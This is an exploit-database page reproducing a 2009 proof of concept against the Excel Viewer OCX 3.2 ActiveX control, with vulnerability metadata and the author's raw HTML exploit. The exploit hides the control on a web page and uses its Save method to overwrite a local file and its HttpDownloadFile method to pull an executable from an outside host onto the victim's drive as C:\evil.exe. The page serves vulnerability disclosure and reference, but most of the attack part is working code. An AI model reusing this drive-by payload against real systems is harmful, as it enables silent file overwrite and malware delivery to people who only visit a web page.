header-logo
Suggest Exploit
vendor:
Excel Viewer OCX
by:
Alfons Luja
9.3
CVSS
HIGH
Arbitrary File Download/Overwrite
20
CWE
Product Name: Excel Viewer OCX
Affected Version From: 3.2
Affected Version To: 3.2
Patch Exists: NO
Related CWE: N/A
CPE: a:officeocx:excel_viewer_ocx
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Avant Browser 11.7.21, IE 6
2009

Excel Viewer OCX 3.2 Arbitrary File Download/Overwrite

A vulnerability in Excel Viewer OCX 3.2 allows an attacker to download and overwrite arbitrary files on the vulnerable system. This is due to the application not properly validating user-supplied input when handling the Save and HttpDownloadFile methods. An attacker can exploit this vulnerability by enticing a user to visit a malicious web page or open a malicious document.

Mitigation:

No known mitigation is available at this time.
Source

Exploit-DB raw data:

<html>
<body>
/*
--=0-0-000000000--x==-xxxxxxxxx<br/>
  - 
    Excel Viewer OCX 3.2        <br/>
    homepage: www.officeocx.com <br/>
    download: www.brothersoft.com/excel-viewer-ocx-51797.html <br/>
 
  - RegKey Safe for Script: True<br/>
  - RegKey Safe for Init: True   <br/>
  - Implements IObjectSafety: True <br/>
  - IDisp Safe:  Safe for untrusted: caller,data <br/>  
  - IPersist Safe:  Safe for untrusted: caller,data  <br/> 
  - IPStorage Safe:  Safe for untrusted: caller,data  <br>
  - Tested on Avant Browser 11.7.21 ie 6
                                                       <br/>
Vuln:                                                 <br/>
   1) Arbitrary File Download [HttpDownloadFile]<br/>
   2) Arbitrary file owerwrite [Save]  <br/>
                                         <br/>
  --==0-0000000011011110===    <br/>

    Propably it worst apps i ever see                      <br/>
    this is  funy  that It is meant as Safe for scripting   <br/>
    They want sell it l0l <br/>
             
---000----------++++---------------000  <br/>
         Alfons Luja                    <br/>
     Pozdrawiam swoich fanóF               <br/>
           9002                            <br/>
            :P                              <br/>
00 -0000000000000000===------------------x <br/>
*/<br/>

<div style="visibility:hidden;">
<object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B965' id='kupa'></object>
<script type="text/javascript">
/* 
    I dont know why but this code act correct only first time
    later it just crash ie 
    In avant browser always is ok but it is necessary to wait a lot time 
    to finsh loading 
    - strange :x 
*/    

 try{
    var obj = document.getElementById('kupa');
    var rem = "http://www.adalex.pl/motyl/motyl-radio.exe";
    var loc = "C:\evil.exe";
    obj.Save("C:\owerwrite.ini");
    obj.HttpDownloadFile(rem,loc);
 }
 catch(err){
       window.alert('Poc failed');
 }
</script>
</div>
</body>
</html>   

# milw0rm.com [2009-01-12]

Navigation

Suggest Exploit

Services By CQR